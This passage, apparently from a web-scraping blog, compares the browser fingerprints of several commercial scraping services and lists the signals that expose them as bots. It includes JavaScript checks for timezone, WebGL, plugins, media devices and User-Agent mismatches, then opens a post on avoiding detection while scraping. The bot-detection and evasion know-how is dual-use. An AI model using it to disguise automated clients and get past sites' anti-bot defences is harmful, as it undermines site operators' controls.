<th>ja3 fingerprint</th>
<th>canvas fingerprint</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36</td>
<td>792ce97b0295f6f9f0d89fe974371a84</td>
<td>b32309a26951912be7dba376398abc3b</td>
<td>E5063313</td>
</tr>
<tr>
<td>2</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36</td>
<td>792ce97b0295f6f9f0d89fe974371a84</td>
<td>b32309a26951912be7dba376398abc3b</td>
<td>E5063313</td>
</tr>
<tr>
<td>3</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36</td>
<td>792ce97b0295f6f9f0d89fe974371a84</td>
<td>b32309a26951912be7dba376398abc3b</td>
<td>E5063313</td>
</tr>
<tr>
<td>4</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36</td>
<td>792ce97b0295f6f9f0d89fe974371a84</td>
<td>b32309a26951912be7dba376398abc3b</td>
<td>E5063313</td>
</tr>
<tr>
<td>5</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36</td>
<td>792ce97b0295f6f9f0d89fe974371a84</td>
<td>b32309a26951912be7dba376398abc3b</td>
<td>E5063313</td>
</tr>
</tbody>
</table>
<p>Obviously, it is very bad that every browser fingerprint is exactly the same. This means that it is possible to state that a website is being scraped whenever a visitor uses a browser fingerprint of <em>792ce97b0295f6f9f0d89fe974371a84</em>.</p>
<p>Some other issues were:</p>
<p>Their scraping browsers have the timezone set to <code>Etc/Unknown</code>. This is very unusual.</p>
<p>You can obtain the timezone with the following JavaScript snippet:</p>
<div class="highlight"><pre><span></span><code><span class="p">(</span><span class="ow">new</span> <span class="nb">window</span><span class="p">.</span><span class="nb">Intl</span><span class="p">.</span><span class="nx">DateTimeFormat</span><span class="p">).</span><span class="nx">resolvedOptions</span><span class="p">().</span><span class="nx">timeZone</span>
</code></pre></div>
<p>Furthermore, the <a href="https://www.scraperapi.com/">scraperapi.com</a> scrapers have no WebGL support. It is not possible to obtain the video card settings.</p>
<p>Usually, normal browsers have a video card such as:</p>
<div class="highlight"><pre><span></span><code><span class="nt">"videoCard"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"></span>
<span class="w"> </span><span class="s2">"Intel Inc."</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">"Intel Iris OpenGL Engine"</span><span class="w"></span>
<span class="p">]</span><span class="w"></span>
</code></pre></div>
<p>You can obtain your video card brand names with the following script:</p>
<div class="highlight"><pre><span></span><code><span class="p">(</span><span class="kd">function</span> <span class="nx">getVideoCardInfo</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">gl</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="s1">'canvas'</span><span class="p">).</span><span class="nx">getContext</span><span class="p">(</span><span class="s1">'webgl'</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">gl</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="p">{</span>
<span class="nx">error</span><span class="o">:</span> <span class="s2">"no webgl"</span><span class="p">,</span>
<span class="p">};</span>
<span class="p">}</span>
<span class="kd">const</span> <span class="nx">debugInfo</span> <span class="o">=</span> <span class="nx">gl</span><span class="p">.</span><span class="nx">getExtension</span><span class="p">(</span><span class="s1">'WEBGL_debug_renderer_info'</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="nx">debugInfo</span><span class="p">){</span>
<span class="k">return</span> <span class="p">{</span>
<span class="nx">vendor</span><span class="o">:</span> <span class="nx">gl</span><span class="p">.</span><span class="nx">getParameter</span><span class="p">(</span><span class="nx">debugInfo</span><span class="p">.</span><span class="nx">UNMASKED_VENDOR_WEBGL</span><span class="p">),</span>
<span class="nx">renderer</span><span class="o">:</span> <span class="nx">gl</span><span class="p">.</span><span class="nx">getParameter</span><span class="p">(</span><span class="nx">debugInfo</span><span class="p">.</span><span class="nx">UNMASKED_RENDERER_WEBGL</span><span class="p">),</span>
<span class="p">};</span>
<span class="p">}</span>
<span class="k">return</span> <span class="p">{</span>
<span class="nx">error</span><span class="o">:</span> <span class="s2">"no WEBGL_debug_renderer_info"</span><span class="p">,</span>
<span class="p">};</span>
<span class="p">})()</span>
</code></pre></div>
<p>Furthermore, their scrapers advertise that they don't have any multimedia devices attached to them:</p>
<div class="highlight"><pre><span></span><code><span class="s2">"multimediaDevices"</span><span class="o">:</span> <span class="p">{</span>
<span class="s2">"speakers"</span><span class="o">:</span> <span class="mf">0</span><span class="p">,</span>
<span class="s2">"micros"</span><span class="o">:</span> <span class="mf">0</span><span class="p">,</span>
<span class="s2">"webcams"</span><span class="o">:</span> <span class="mf">0</span>
<span class="p">}</span>
</code></pre></div>
<p>The screen dimensions are strange as well:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"outerWidth"</span><span class="p">:</span><span class="w"> </span><span class="mi">1440</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"outerHeight"</span><span class="p">:</span><span class="w"> </span><span class="mi">800</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"innerWidth"</span><span class="p">:</span><span class="w"> </span><span class="mi">800</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"innerHeight"</span><span class="p">:</span><span class="w"> </span><span class="mi">600</span><span class="p">,</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>An inner window size of 800x600 is not prohibited, it is just very uncommon on real devices. It is, however, the default viewport of Puppeteer-controlled Chromium browsers... Just saying.</p>
<h2>Detecting <a href="https://scrapingrobot.com">scrapingrobot.com</a></h2>
<p>When scraping with <a href="https://scrapingrobot.com">scrapingrobot.com</a> five times, we obtain the following fingerprints:</p>
<table>
<thead>
<tr>
<th>#</th>
<th>user agent</th>
<th>browser fingerprint</th>
<th>ja3 fingerprint</th>
<th>canvas fingerprint</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36</td>
<td>a265019e42a330492b5182c3a7275db9</td>
<td>66918128f1b9b03303d77c6f2eefd128</td>
<td>4EDA6E5B</td>
</tr>
<tr>
<td>2</td>
<td>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15</td>
<td>9e945fadfdea5733f328c54542afb842</td>
<td>66918128f1b9b03303d77c6f2eefd128</td>
<td>4EDA6E5B</td>
</tr>
<tr>
<td>3</td>
<td>Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36</td>
<td>eae9223cec3ad4985340f60fcb5f7e1f</td>
<td>-</td>
<td>4EDA6E5B</td>
</tr>
<tr>
<td>4</td>
<td>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.41 YaBrowser/21.2.0.1122 Yowser/2.5 Safari/537.36</td>
<td>310f1133a18911b800f465e6f783c7b2</td>
<td>66918128f1b9b03303d77c6f2eefd128</td>
<td>4EDA6E5B</td>
</tr>
<tr>
<td>5</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36</td>
<td>c877493938932c04567b0f967507f56d</td>
<td>-</td>
<td>4EDA6E5B</td>
</tr>
</tbody>
</table>
<p>As you can see, the browser fingerprint switches all the time. This is a good sign and prevents the easiest route of detection. Regarding fingerprinting, I don't see too many issues with <a href="https://scrapingrobot.com">scrapingrobot.com</a>. </p>
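<p>A quick way to see which columns of the table above actually vary is to count the distinct values per column. The following is only a minimal sketch: the <code>samples</code> array re-types three columns of the table, and <code>countDistinct</code> is a hypothetical helper name, not part of any library.</p>
<div class="highlight"><pre><span></span><code>// Fingerprint samples copied from the table above ("-" is kept exactly as shown there).
const samples = [
  { browser: 'a265019e42a330492b5182c3a7275db9', ja3: '66918128f1b9b03303d77c6f2eefd128', canvas: '4EDA6E5B' },
  { browser: '9e945fadfdea5733f328c54542afb842', ja3: '66918128f1b9b03303d77c6f2eefd128', canvas: '4EDA6E5B' },
  { browser: 'eae9223cec3ad4985340f60fcb5f7e1f', ja3: '-', canvas: '4EDA6E5B' },
  { browser: '310f1133a18911b800f465e6f783c7b2', ja3: '66918128f1b9b03303d77c6f2eefd128', canvas: '4EDA6E5B' },
  { browser: 'c877493938932c04567b0f967507f56d', ja3: '-', canvas: '4EDA6E5B' },
];

// Hypothetical helper: number of distinct values seen for each field.
function countDistinct(rows) {
  const seen = {};
  for (const row of rows) {
    for (const [field, value] of Object.entries(row)) {
      if (!seen[field]) seen[field] = new Set();
      seen[field].add(value);
    }
  }
  const counts = {};
  for (const [field, values] of Object.entries(seen)) {
    counts[field] = values.size;
  }
  return counts;
}

console.log(countDistinct(samples));
</code></pre></div>
<p>For the five samples, the browser fingerprint yields five distinct values, while the canvas fingerprint yields a single one. A column that never changes is a candidate for grouping requests, although a low-entropy value alone proves little.</p>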
<p>However, there are some other issues with <a href="https://scrapingrobot.com">scrapingrobot.com</a>:</p>
<p>The scrapers of scrapingrobot are using the following screen size properties:</p>
<div class="highlight"><pre><span></span><code><span class="nt">"dimensions"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"window.outerWidth"</span><span class="p">:</span><span class="w"> </span><span class="mi">800</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"window.outerHeight"</span><span class="p">:</span><span class="w"> </span><span class="mi">600</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"window.innerWidth"</span><span class="p">:</span><span class="w"> </span><span class="mi">2470</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"window.innerHeight"</span><span class="p">:</span><span class="w"> </span><span class="mi">1340</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"window.screen.width"</span><span class="p">:</span><span class="w"> </span><span class="mi">2560</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"window.screen.height"</span><span class="p">:</span><span class="w"> </span><span class="mi">1440</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>The <code>window.outerWidth</code> and <code>window.outerHeight</code> properties should not be smaller than
the <code>window.innerWidth</code> and <code>window.innerHeight</code> properties, because the outer size includes the toolbars and borders around the viewport. This is a very strong indication
that the browser was messed with.</p>
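<p>Such a consistency check is easy to automate. The sketch below assumes the dimensions arrive as a plain object with the same keys as the record above; <code>findDimensionAnomalies</code> is a hypothetical name chosen for illustration.</p>
<div class="highlight"><pre><span></span><code>// Hypothetical check: flag window geometry where the viewport is larger
// than the window that is supposed to contain it.
function findDimensionAnomalies(d) {
  const anomalies = [];
  if (d['window.innerWidth'] > d['window.outerWidth']) {
    anomalies.push('innerWidth exceeds outerWidth');
  }
  if (d['window.innerHeight'] > d['window.outerHeight']) {
    anomalies.push('innerHeight exceeds outerHeight');
  }
  return anomalies;
}

// The record shown above triggers both checks.
console.log(findDimensionAnomalies({
  'window.outerWidth': 800,
  'window.outerHeight': 600,
  'window.innerWidth': 2470,
  'window.innerHeight': 1340,
}));
</code></pre></div>
<p>Page zoom can legitimately shift these numbers in some browsers, so a hit is better treated as one signal among several than as proof.</p>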
<p>Furthermore, their scrapers don't have any plugin information (<code>navigator.plugins</code>) associated with them. This is very uncommon for legit Chrome browsers. Usually, every Chrome browser has standard plugin information such as:</p>
<div class="highlight"><pre><span></span><code><span class="nt">"plugins"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"></span>
<span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Chrome PDF Plugin"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"description"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Portable Document Format"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"mimeType"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"application/x-google-chrome-pdf"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"suffixes"</span><span class="p">:</span><span class="w"> </span><span class="s2">"pdf"</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"></span>
<span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Chrome PDF Viewer"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"description"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"mimeType"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"application/pdf"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"suffixes"</span><span class="p">:</span><span class="w"> </span><span class="s2">"pdf"</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"></span>
<span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Native Client"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"description"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"mimeType"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"application/x-nacl"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"suffixes"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="p">]</span><span class="w"></span>
</code></pre></div>
<p>With <code>scrapingrobot.com</code>, this information looks like this:</p>
<div class="highlight"><pre><span></span><code><span class="nt">"plugins"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"></span>
<span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"mimeType"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"></span>
<span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"mimeType"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="p">]</span><span class="w"></span>
</code></pre></div>
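<p>A check for this kind of hollow plugin list could look roughly as follows. It is a sketch under the assumption that the plugin list has been serialized into the JSON shape shown above; <code>pluginListLooksSpoofed</code> is a hypothetical helper.</p>
<div class="highlight"><pre><span></span><code>// Hypothetical check on a serialized navigator.plugins list.
function pluginListLooksSpoofed(plugins) {
  if (!Array.isArray(plugins)) return true;
  if (plugins.length === 0) return true;
  // A real entry carries a name and a mimeType object with a type string.
  return plugins.some((plugin) => {
    if (typeof plugin.name !== 'string') return true;
    if (!plugin.mimeType) return true;
    return typeof plugin.mimeType.type !== 'string';
  });
}

console.log(pluginListLooksSpoofed([{ mimeType: null }, { mimeType: null }]));
</code></pre></div>
<p>The check is only meaningful when the user agent claims to be a desktop Chrome browser. Mobile browsers commonly report an empty plugin list.</p>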
<p>Another issue with the scrapers of <code>scrapingrobot.com</code> is that they don't have any multimedia devices (<code>navigator.mediaDevices</code>) associated with the browser. Usually, a normal browser has at least one multimedia device associated with it (such as speakers, microphones or webcams).</p>
<p>Normal:</p>
<div class="highlight"><pre><span></span><code><span class="nt">"multimediaDevices"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"speakers"</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"micros"</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"webcams"</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>scrapingrobot.com:</p>
<div class="highlight"><pre><span></span><code><span class="nt">"multimediaDevices"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"speakers"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"micros"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"webcams"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
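<p>One plausible way to derive such counts is to group the result of <code>navigator.mediaDevices.enumerateDevices()</code> by the <code>kind</code> field of each entry. This is an assumption for illustration, since the exact collection code is not shown here, and <code>countMediaDevices</code> is a hypothetical helper.</p>
<div class="highlight"><pre><span></span><code>// Hypothetical helper: tally MediaDeviceInfo-like objects by their `kind` field.
function countMediaDevices(devices) {
  const counts = { speakers: 0, micros: 0, webcams: 0 };
  for (const device of devices) {
    if (device.kind === 'audiooutput') counts.speakers += 1;
    if (device.kind === 'audioinput') counts.micros += 1;
    if (device.kind === 'videoinput') counts.webcams += 1;
  }
  return counts;
}

// In a browser, the input would come from:
//   navigator.mediaDevices.enumerateDevices().then(countMediaDevices)
console.log(countMediaDevices([]));
</code></pre></div>
<p>An empty device list produces the all-zero record shown above.</p>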
<h2>Detecting <a href="https://scrapfly.io">scrapfly.io</a></h2>
<p>The fingerprints recorded are as follows:</p>
<table>
<thead>
<tr>
<th>#</th>
<th>user agent</th>
<th>browser fingerprint</th>
<th>ja3 fingerprint</th>
<th>TCP/IP fingerprint</th>
<th>canvas fingerprint</th>
<th>WebGL fingerprint</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36</td>
<td>75957d6c70a68c4d716e986554e313d4</td>
<td>b32309a26951912be7dba376398abc3b</td>
<td>Linux / Chrome OS</td>
<td>4EDA6E5B</td>
<td>45b0cf9d</td>
</tr>
<tr>
<td>2</td>
<td>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36</td>
<td>210181aae7512e1e68c4058fa330c040</td>
<td>b32309a26951912be7dba376398abc3b</td>
<td>Linux / Chrome OS</td>
<td>4EDA6E5B</td>
<td>45b0cf9d</td>
</tr>
<tr>
<td>3</td>
<td>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36</td>
<td>2c901d174dc4faf1b3c7e71e7a963d62</td>
<td>b32309a26951912be7dba376398abc3b</td>
<td>Linux / Chrome OS</td>
<td>4EDA6E5B</td>
<td>45b0cf9d</td>
</tr>
<tr>
<td>4</td>
<td>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36</td>
<td>a841a8e49dca94195ad161674c9762fa</td>
<td>7f805430de1e7d98b1de033adb58cf46</td>
<td>Linux / Chrome OS</td>
<td>4EDA6E5B</td>
<td>45b0cf9d</td>
</tr>
<tr>
<td>5</td>
<td>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36</td>
<td>52d35b65383ae737bd6d735078d59b20</td>
<td>b32309a26951912be7dba376398abc3b</td>
<td>Linux / Chrome OS</td>
<td>4EDA6E5B</td>
<td>45b0cf9d</td>
</tr>
</tbody>
</table>
<p>Based on the fingerprints, we cannot state much. The browser fingerprint is different for every collected sample. This is already a good sign.</p>
<p>It is noteworthy that the TCP/IP fingerprint most likely stems from a Linux-based operating system and not from macOS, as their User-Agent claims.</p>
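<p>Comparing the operating system claimed in the User-Agent with the one suggested by the TCP/IP fingerprint can be sketched as follows. Both function names are hypothetical, and the code assumes that the TCP/IP fingerprinting tool returns a plain-text label such as the one in the table above.</p>
<div class="highlight"><pre><span></span><code>// Hypothetical helper: derive a coarse OS family from a User-Agent string.
function osFamilyFromUserAgent(userAgent) {
  if (/Windows NT/.test(userAgent)) return 'Windows';
  if (/iPhone|iPad/.test(userAgent)) return 'iOS';
  if (/Macintosh/.test(userAgent)) return 'Mac';
  // Android and Chrome OS are built on the Linux kernel.
  if (/Android|Linux|CrOS/.test(userAgent)) return 'Linux';
  return 'unknown';
}

// Assumption: the TCP/IP label contains the OS family name as plain text.
function osClaimMatchesTcpIp(userAgent, tcpIpLabel) {
  const family = osFamilyFromUserAgent(userAgent);
  return tcpIpLabel.toLowerCase().includes(family.toLowerCase());
}

const claimedUa = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36';
console.log(osClaimMatchesTcpIp(claimedUa, 'Linux / Chrome OS'));
</code></pre></div>
<p>A mismatch is only a hint, because traffic that passes through a proxy or VPN carries the TCP/IP characteristics of that intermediary.</p>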
<p>The canvas and WebGL fingerprints are always the same. Those fingerprints don't convey much entropy, hence they alone don't prove that all samples originate from the same scraping software.</p>
<p>They seem to have created an overall good service. Unfortunately, they made some mistakes regarding the <code>navigator</code> property.</p>
<p>The User-Agent in the HTTP headers is not the same as the user agent in the <code>navigator</code> property:</p>
<ol>
<li><strong>HTTP User-Agent:</strong> <em>Mozilla/5.0 (X11; Linux x86_64; x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36</em></li>
<li><strong><code>navigator</code> User-Agent:</strong> <em>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36</em></li>
</ol>
<p>This is a very obvious mistake that would result in an immediate ban with many anti-bot systems.</p>
<p>Furthermore, they always spoof the same graphics card:</p>
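<p>On the server side, this comparison takes only a few lines. The sketch below assumes that the page's JavaScript reports <code>navigator.userAgent</code> back to the server; <code>chromeMajorVersion</code> and <code>compareUserAgents</code> are hypothetical helper names.</p>
<div class="highlight"><pre><span></span><code>// Hypothetical helper: extract the Chrome major version, or null if absent.
function chromeMajorVersion(userAgent) {
  const match = /Chrome\/(\d+)\./.exec(userAgent);
  return match ? Number(match[1]) : null;
}

// Compare the User-Agent header with the value reported by navigator.userAgent.
function compareUserAgents(httpUserAgent, navigatorUserAgent) {
  return {
    identical: httpUserAgent === navigatorUserAgent,
    httpChrome: chromeMajorVersion(httpUserAgent),
    navigatorChrome: chromeMajorVersion(navigatorUserAgent),
  };
}

console.log(compareUserAgents(
  'Mozilla/5.0 (X11; Linux x86_64; x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36',
  'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'
));
</code></pre></div>
<p>For the two strings listed above, the result reports a mismatch, with Chrome 68 in the header and Chrome 78 in the <code>navigator</code> property.</p>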
<div class="highlight"><pre><span></span><code> <span class="s2">"videoCard"</span><span class="o">:</span> <span class="p">[</span>
<span class="s2">"Google Inc."</span><span class="p">,</span>
<span class="s2">"ANGLE (NVIDIA GeForce GTX 660 Direct3D9Ex vs_3_0 ps_3_0)"</span>
<span class="p">],</span>
</code></pre></div>
<p>Every browser they use has the same string <em>ANGLE (NVIDIA GeForce GTX 660 Direct3D9Ex vs_3_0 ps_3_0)</em> as their video card name.</p>
<p>Another issue is that their scraping browser does not have a single multimedia device attached to it:</p>
<div class="highlight"><pre><span></span><code><span class="s2">"multimediaDevices"</span><span class="o">:</span> <span class="p">{</span>
<span class="s2">"speakers"</span><span class="o">:</span> <span class="mf">0</span><span class="p">,</span>
<span class="s2">"micros"</span><span class="o">:</span> <span class="mf">0</span><span class="p">,</span>
<span class="s2">"webcams"</span><span class="o">:</span> <span class="mf">0</span>
<span class="p">},</span>
</code></pre></div>
<p>Did you ever come across a Macintosh computer without a microphone, speaker or webcam? Nope, I haven't.</p>
<p>Another mistake they make is to not set the <code>navigator.plugins</code> property at all:</p>
<div class="highlight"><pre><span></span><code> <span class="s2">"plugins"</span><span class="o">:</span> <span class="p">[],</span>
<span class="s2">"mimeTypes"</span><span class="o">:</span> <span class="p">[],</span>
</code></pre></div>
<p>Real browsers always have some standard values here.</p>
<p>Another issue with <a href="https://scrapfly.io">scrapfly.io</a> is that all their HTTP requests come equipped with the <code>X-Amzn-Trace-Id</code> HTTP header, which is added to HTTP requests that pass through <a href="https://aws.amazon.com/premiumsupport/knowledge-center/trace-elb-x-amzn-trace-id/">Amazon AWS</a> load balancers. This feature allows tracing HTTP sessions for debugging purposes.</p>
7 Common Mistakes in Professional Scraping2021-03-01T23:13:00+01:002021-03-03T18:30:00+01:00Nikolai Tschachertag:incolumitas.com,2021-03-01:/2021/03/01/7-common-mistakes-in-professional-scraping/
<p>In this blog post, I talk about my several years of experience with web scraping and the common mistakes I made along the way. The more I dive into web scraping, the more I realize how easy it is to make wrong decisions when scraping a site. For that reason, I compiled a list of seven common mistakes with regard to web scraping.</p><p>The seven scraping commandments <a style="font-size: 70%" href="https://www.youtube.com/watch?v=ZYb_8MM1tGQ">[1]</a></p>
<ol>
<li><a href="#lie">Don't Lie about your User Agent</a></li>
<li><a href="#speed">Don't scrape too aggressively</a></li>
<li><a href="#serverless">Pick the right choice of scraping/crawling architecture that matches your needs</a></li>
<li><a href="#mistakes">Learn from Mistakes from Professional Scraping Services</a></li>
<li><a href="#fingerprinting">Don't disregard Fingerprinting</a></li>
<li><a href="#behavior">Be Aware of Behavioral UI Analysis</a></li>
<li><a href="#sideChannel">Side Channel Attacks can Reveal that you are a Bot</a></li>
</ol>
<h2>Introduction</h2>
<p>I have been creating scrapers for years. Most of them were quite rubbish. But in the painful process you learn from some common mistakes. In this blog post, I share some of the most frequent mistakes that I spot in the wild and that I made myself. Furthermore, I give general advice on how to remain (somewhat) undetected when scraping.</p>
<p>Mandatory note: Many large websites actually don't sanction scraping that much. I would count <a href="https://www.google.com/">Google</a> and <a href="https://www.amazon.com/">Amazon</a> among the sites that only moderately prevent scraping. The reason is obvious: Those platforms actually massively profit when other people/companies use their data in their products. Google and Amazon are heavy players when it comes to E-Commerce and Online Marketing. So they both have an incentive to allow third-party tools to access their platforms to a certain degree.</p>
<p>Other sites such as Instagram and LinkedIn are much more aggressive when it comes to blocking scrapers. They'll ban ill-behaved user agents at the first suspicious activity. Websites such as LinkedIn are practically impossible to use without having an account.</p>
<p>Therefore, the advice in this blog post might be too strict or too lax for your specific use case. Keep that in mind.</p>
<p>Furthermore, this advice does not apply exclusively to scraping or crawling. Scraping often has a very negative connotation.</p>
<p>But an increasingly large percentage of people are using frameworks such as <a href="https://github.com/puppeteer/puppeteer">puppeteer</a> or <a href="https://github.com/microsoft/playwright">playwright</a> to automate otherwise mundane tasks. Therefore, there are many legit reasons why you might want to train your software to navigate websites like a real human being.</p>
<h2>7 Common Mistakes in Professional Scraping</h2>
<h3 id="lie">1. Don't Lie about your User Agent</h3>
<p>If you are scraping with puppeteer and headless chrome on an Amazon EC2 instance and you set your user agent to be an iPhone </p>
<p><em>Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1</em></p>
<p>websites have a million ways to find out that you are lying.</p>
<p>For example, what happens when you forget to adjust the user agent accordingly in the <code>navigator.userAgent</code> and <code>navigator.appVersion</code> properties? Or what if you forget to spoof the <code>navigator.platform</code> property to the correct iPhone platform?</p>
<p>Those static strings are easy to fix, but the browser exposes such an extremely vast API to websites that it is impossible to patch in its entirety.</p>
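<p>To illustrate how cheaply a website can test the static strings, here is a minimal sketch. It assumes that the page's JavaScript has copied <code>navigator.userAgent</code>, <code>navigator.appVersion</code> and <code>navigator.platform</code> into a plain object; <code>findNavigatorInconsistencies</code> is a hypothetical name.</p>
<div class="highlight"><pre><span></span><code>// Hypothetical consistency check on values reported by the page's JavaScript.
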